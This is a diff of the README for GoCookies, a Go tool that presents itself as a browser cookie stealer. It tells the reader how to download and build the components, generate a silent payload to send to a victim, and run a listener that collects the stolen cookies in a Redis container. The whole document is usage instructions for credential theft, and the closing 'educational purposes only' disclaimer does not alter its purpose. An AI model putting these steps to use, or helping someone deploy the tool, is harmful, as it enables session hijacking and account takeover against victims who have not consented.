simonfalke-01/GoCookies/README.md

-# gocookies
-**[For educational purposes only]** </br>
-A browser cookie stealer written in Go.</br>
-There are 3 components to this project:
-- gocookies
-- gocookies-generate
-- gocookies-listener

-The generator is used to generate a payload that can be sent to the victim.
+# GoCookies - A Browser Cookie Stealer Written in Go

-It will steal the cookies from the victim's browser and send them to the listener.
+GoCookies is a tool for stealing cookies from a victim's browser and sending them to an attacker's machine.
+It is written in Go and has three components: `gocookies`, `gocookies-generate`, and `gocookies-listener`.

-The listener is run on the attacker's machine and will receive the cookies from the victim.
-It stores the received cookies in a Redis database that will be automatically setup within a Docker container.
+The `gocookies-generate` component generates a payload that can be sent to the victim.
+This payload steals the cookies from the victim's browser and sends them to the `gocookies-listener` component running on the attacker's machine.
+The `gocookies-listener` component receives the cookies and stores them in a Redis database running in a Docker container.

-## Pre-requisites
+## Prerequisites

+Before using GoCookies, you will need to have the following installed:

 - Docker
 - Go
 - Git

-## Getting started
+## Getting Started

-### gocookies-generate
+To get started with GoCookies, follow these steps:

-Clone the repository.
+1. Clone the repository:

 ```
 git clone https://github.com/simonfalke-01/gocookies.git
 ```

-Then, download the latest release.
+2. Download the latest release:

-#### Linux
+For Linux:
 ```
 curl https://github.com/simonfalke-01/gocookies/releases/latest/download/generate-linux -o generate && curl https://github.com/simonfalke-01/gocookies/releases/latest/download/listener-linux -o listener && chmod +x generate listener
 ```

-#### macOS
+For macOS:
 ```
 curl https://github.com/simonfalke-01/gocookies/releases/latest/download/generate-macos -o generate && curl https://github.com/simonfalke-01/gocookies/releases/latest/download/listener-macos -o listener && chmod +x generate listener
 ```

-Alternatively, you can go to the [releases](https://github.com/simonfalke-01/gocookies/releases/latest/) page and download the binaries manually.
+Alternatively, you can download the binaries manually from the [releases](https://github.com/simonfalke-01/gocookies/releases/latest/) page.

-## Generate payload
-Ensure you have already cloned the repository and downloaded the latest release.
-If not, see [Getting started](#getting-started). </br>
-The `./generate` command will generate a payload that can be sent to the victim. </br>
+## Generating a Payload

-It requires the following arguments:
+To generate a payload, use the `gocookies-generate` component.
+This component requires the following arguments:

-- `-h` - The host of the listener
+- `-h` - The host of the listener.
-- `-p` - The port of the listener
+- `-p` - The port of the listener.
-- `-d` - The path of the gocookies directory
+- `-d` - The path of the `gocookies` directory.
-- `-v` (optional) - Whether the payload generated will print verbose output (normally, the payload does not print any output)
+- `-v` (optional) - Whether to print verbose output (by default, the payload does not print any output).

 Example:

 ```
 ./generate -h localhost -p 8091 -d ~/gocookies/gocookies
 ```

-Where ~/gocookies is the cloned repository. </br>
+Here, `~/gocookies` is the cloned repository.

-Then, you may send the payload to the victim.
+Once the payload is generated, you can send it to the victim.

-## Setup listener
-Ensure you have already cloned the repository and downloaded the latest release.
-If not, see [Getting started](#getting-started). </br>
-The `./listener` command will setup the listener. </br>
+## Setting up the Listener

-It requires the following arguments:
+To set up the listener, use the `gocookies-listener` component.
+This component requires the following arguments:

-- `-r` - The port which Redis will be running on
+- `-r` - The port on which Redis will be running.
-- `-p` - The port which the listener will be running on
+- `-p` - The port on which the listener will be running.
 - `-e` (optional) - Whether to use an existing Redis container (if not specified, a new Redis container will be created).
 If specified, `-r` will be the port of the existing Redis container.

 Example:

 ```
 ./listener -r 8090 -p 8091
 ```

-Then, you may wait for the victim to connect to the listener and send the cookies.
+Once the listener is set up, you can wait for the victim to connect to it and send the cookies.

-## Build from source
+## Building from Source

-Ensure you have already cloned the repository.
-If not, see [Getting started](#getting-started). </br>
-### Building gocookies-generate
+To build `gocookies-generate` from source, navigate to the `gocookies-generate` directory and run:

 ```
-cd gocookies-generate
 go build
 ```

-### Building gocookies-listener
+To build `gocookies-listener` from source, navigate to the `gocookies-listener` directory and run:

 ```
-cd gocookies-listener
 go build
 ```

+## Disclaimer

+This tool is for educational purposes only.
+Using this tool without the consent of the victim is illegal and unethical.
+The author of this tool is not responsible for any illegal or unethical use of this tool.